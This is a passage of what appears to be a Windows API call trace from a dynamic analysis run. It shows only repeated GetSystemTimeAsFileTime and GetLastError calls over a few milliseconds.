lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.876] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.877] GetLastError () returned 0x0 [0202.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.878] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.878] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.879] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.880] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.881] GetLastError () returned 0x0 [0202.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.882] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.883] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: 